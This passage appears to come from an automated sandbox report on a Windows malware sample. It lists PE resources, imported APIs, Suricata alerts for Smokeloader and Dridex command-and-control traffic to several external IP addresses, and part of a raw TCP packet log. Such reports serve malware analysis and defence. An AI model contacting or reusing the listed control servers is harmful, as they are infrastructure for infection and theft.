                                                                                                                                      RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                                                                                                                      RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                                                                                                                      RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.41228893058161353
                                                                                                                                      RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.41228893058161353
                                                                                                                                      RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.40081967213114755
                                                                                                                                      RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.40081967213114755
                                                                                                                                      RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.46897163120567376
                                                                                                                                      RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.46897163120567376
                                                                                                                                      RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3742004264392324
                                                                                                                                      RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3742004264392324
                                                                                                                                      RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5171480144404332
                                                                                                                                      RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5171480144404332
                                                                                                                                      RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6059907834101382
                                                                                                                                      RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6059907834101382
                                                                                                                                      RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                                                                                                                      RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                                                                                                                      RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.487551867219917
                                                                                                                                      RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.487551867219917
                                                                                                                                      RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5060975609756098
                                                                                                                                      RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5060975609756098
                                                                                                                                      RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4860655737704918
                                                                                                                                      RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4860655737704918
                                                                                                                                      RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5390070921985816
                                                                                                                                      RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5390070921985816
                                                                                                                                      RT_DIALOG0x7dc300x58data0.8977272727272727
                                                                                                                                      RT_STRING0x7dc880x2c6dataTamilIndia0.4830985915492958
                                                                                                                                      RT_STRING0x7dc880x2c6dataTamilSri Lanka0.4830985915492958
                                                                                                                                      RT_STRING0x7df500x6b4dataTamilIndia0.42657342657342656
                                                                                                                                      RT_STRING0x7df500x6b4dataTamilSri Lanka0.42657342657342656
                                                                                                                                      RT_STRING0x7e6080x242dataTamilIndia0.4982698961937716
                                                                                                                                      RT_STRING0x7e6080x242dataTamilSri Lanka0.4982698961937716
                                                                                                                                      RT_STRING0x7e8500x620dataTamilIndia0.4343112244897959
                                                                                                                                      RT_STRING0x7e8500x620dataTamilSri Lanka0.4343112244897959
                                                                                                                                      RT_STRING0x7ee700x292dataTamilIndia0.4817629179331307
                                                                                                                                      RT_STRING0x7ee700x292dataTamilSri Lanka0.4817629179331307
                                                                                                                                      RT_ACCELERATOR0x79b300x48dataTamilIndia0.8472222222222222
                                                                                                                                      RT_ACCELERATOR0x79b300x48dataTamilSri Lanka0.8472222222222222
                                                                                                                                      RT_GROUP_CURSOR0x79fd80x22data1.0294117647058822
                                                                                                                                      RT_GROUP_CURSOR0x7bcb80x30data0.9375
                                                                                                                                      RT_GROUP_CURSOR0x7d9a00x30data0.9375
                                                                                                                                      RT_GROUP_ICON0x6ca580x68dataTamilIndia0.7019230769230769
                                                                                                                                      RT_GROUP_ICON0x6ca580x68dataTamilSri Lanka0.7019230769230769
                                                                                                                                      RT_GROUP_ICON0x668f80x68dataTamilIndia0.6826923076923077
                                                                                                                                      RT_GROUP_ICON0x668f80x68dataTamilSri Lanka0.6826923076923077
                                                                                                                                      RT_GROUP_ICON0x732800x76dataTamilIndia0.6779661016949152
                                                                                                                                      RT_GROUP_ICON0x732800x76dataTamilSri Lanka0.6779661016949152
                                                                                                                                      RT_GROUP_ICON0x79ab80x76dataTamilIndia0.6779661016949152
                                                                                                                                      RT_GROUP_ICON0x79ab80x76dataTamilSri Lanka0.6779661016949152
                                                                                                                                      RT_VERSION0x7d9d00x25cdata0.5413907284768212

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllInterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, EnumCalendarInfoW, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, LCMapStringW, EnumCalendarInfoA, InterlockedIncrement, CommConfigDialogA, GetConsoleAliasExesA, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, CreateFileW
                                                                                                                                      GDI32.dllGetCharWidthI, CreateDCA, CreateDCW, GetCharWidth32A
                                                                                                                                      ADVAPI32.dllReadEventLogW
                                                                                                                                      ole32.dllCoSuspendClassObjects
                                                                                                                                      WINHTTP.dllWinHttpOpen, WinHttpCheckPlatform

                                                                                                                                      Possible Origin

                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      TamilIndia
                                                                                                                                      TamilSri Lanka

                                                                                                                                      Network Behavior

                                                                                                                                      Suricata IDS Alerts

                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-10-08T03:14:22.194672+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:23.607928+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:24.986323+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:26.372379+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:27.804881+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449740180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:29.188524+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449741180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:30.567066+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449742180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:31.967427+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449743180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:33.349888+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449744180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:34.724537+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449745180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:36.129091+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449746180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:37.511221+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:38.888606+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449748180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:40.294985+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449749180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:41.687004+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449750180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:43.070323+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449751180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:44.453846+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449752180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:46.078180+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449753180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:47.954405+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449754180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:49.384205+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449755180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:50.822470+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449756180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:52.232319+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449758180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:53.619316+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449759180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:55.012096+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449760180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:57.758027+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449773180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:14:59.141611+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449784180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:00.543733+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449795180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:01.943079+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449803180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:03.347158+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449812180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:04.734946+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449822180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:06.122207+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449831180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:07.506497+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449841180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:15:19.207418+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44991523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:19.556728+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44991523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:19.731852+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.168443192.168.2.449915TCP
                                                                                                                                      2024-10-08T03:15:20.940399+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44992423.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:21.301374+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44992423.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:21.924039+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44993523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:22.202449+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44993523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:23.127857+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44994223.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:23.407326+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44994223.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:24.007314+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44995123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:24.284045+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44995123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:24.904929+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44995923.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:25.174280+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44995923.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:25.814603+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44996523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:26.096204+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44996523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:26.719338+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44997123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:27.035482+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44997123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:27.642402+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44997723.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:27.919881+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44997723.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:28.579765+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44998323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:28.860193+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44998323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:29.478717+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44998923.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:29.756748+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44998923.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:30.411627+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44999523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:30.634802+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.44999523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:31.283857+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45000123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:31.568650+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45000123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:32.191015+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45000823.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:32.467294+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45000823.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:33.069306+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45001523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:33.339954+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45001523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:33.957275+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45002423.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:34.238068+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45002423.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:34.867331+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003023.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:35.149562+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45003023.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:36.316479+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003623.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:36.592551+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45003623.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:37.218884+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:38.491915+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45004323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:15:43.167928+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45005523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:16:17.332902+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450056180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:16:25.215333+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450057180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:16:35.175377+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450058180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:16:47.543160+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450059180.75.11.13380TCP
                                                                                                                                      2024-10-08T03:16:57.444928+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006023.145.40.168443TCP
                                                                                                                                      2024-10-08T03:16:57.772199+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006023.145.40.168443TCP
                                                                                                                                      2024-10-08T03:16:58.438011+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:16:58.803947+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006123.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:02.272122+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450062201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:17:16.307008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:16.585580+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006323.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:20.704358+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450064201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:17:34.328112+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:34.688036+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006523.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:38.839751+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450066201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:17:51.835614+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45006723.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:52.198933+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.45006723.145.40.168443TCP
                                                                                                                                      2024-10-08T03:17:56.257177+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450068201.103.8.13580TCP
                                                                                                                                      2024-10-08T03:18:03.951900+02002019082ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.45006923.145.40.113443TCP
                                                                                                                                      2024-10-08T03:18:03.968253+02002019082ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND1192.168.2.45006923.145.40.113443TCP

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Oct 8, 2024 03:14:20.802907944 CEST4973680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:20.807918072 CEST8049736180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:20.811443090 CEST4973680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:20.830836058 CEST4973680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:20.830836058 CEST4973680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:20.836018085 CEST8049736180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:20.836055994 CEST8049736180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:22.194552898 CEST8049736180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:22.194612026 CEST8049736180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:22.194672108 CEST4973680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:22.196510077 CEST4973680192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:22.199690104 CEST4973780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:22.201554060 CEST8049736180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:22.204688072 CEST8049737180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:22.204808950 CEST4973780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:22.204900980 CEST4973780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:22.204952955 CEST4973780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:22.209880114 CEST8049737180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:22.209908962 CEST8049737180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:23.607597113 CEST8049737180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:23.607645035 CEST8049737180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:23.607928038 CEST4973780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:23.607928038 CEST4973780192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:23.610338926 CEST4973880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:23.612952948 CEST8049737180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:23.615382910 CEST8049738180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:23.615633965 CEST4973880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:23.615633965 CEST4973880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:23.615633965 CEST4973880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:23.620589018 CEST8049738180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:23.620711088 CEST8049738180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:24.986113071 CEST8049738180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:24.986160040 CEST8049738180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:24.986323118 CEST4973880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:24.986417055 CEST4973880192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:24.988500118 CEST4973980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:24.991677999 CEST8049738180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:24.993643045 CEST8049739180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:24.993730068 CEST4973980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:24.993828058 CEST4973980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:24.993864059 CEST4973980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:24.998874903 CEST8049739180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:24.998903036 CEST8049739180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:26.372226954 CEST8049739180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:26.372284889 CEST8049739180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:26.372379065 CEST4973980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:26.372486115 CEST4973980192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:26.374844074 CEST4974080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:26.377368927 CEST8049739180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:26.379756927 CEST8049740180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:26.380966902 CEST4974080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:26.381064892 CEST4974080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:26.381099939 CEST4974080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:26.385870934 CEST8049740180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:26.386064053 CEST8049740180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:27.804676056 CEST8049740180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:27.804729939 CEST8049740180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:27.804881096 CEST4974080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:27.805133104 CEST4974080192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:27.807914972 CEST4974180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:27.810049057 CEST8049740180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:27.812818050 CEST8049741180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:27.812952042 CEST4974180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:27.813083887 CEST4974180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:27.813113928 CEST4974180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:27.818119049 CEST8049741180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:27.818147898 CEST8049741180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:29.188271999 CEST8049741180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:29.188338995 CEST8049741180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:29.188524008 CEST4974180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:29.188555002 CEST4974180192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:29.190633059 CEST4974280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:29.193809032 CEST8049741180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:29.195538998 CEST8049742180.75.11.133192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:29.195738077 CEST4974280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:29.195943117 CEST4974280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:29.195971012 CEST4974280192.168.2.4180.75.11.133
                                                                                                                                      Oct 8, 2024 03:14:29.201134920 CEST8049742180.75.11.133192.168.2.4
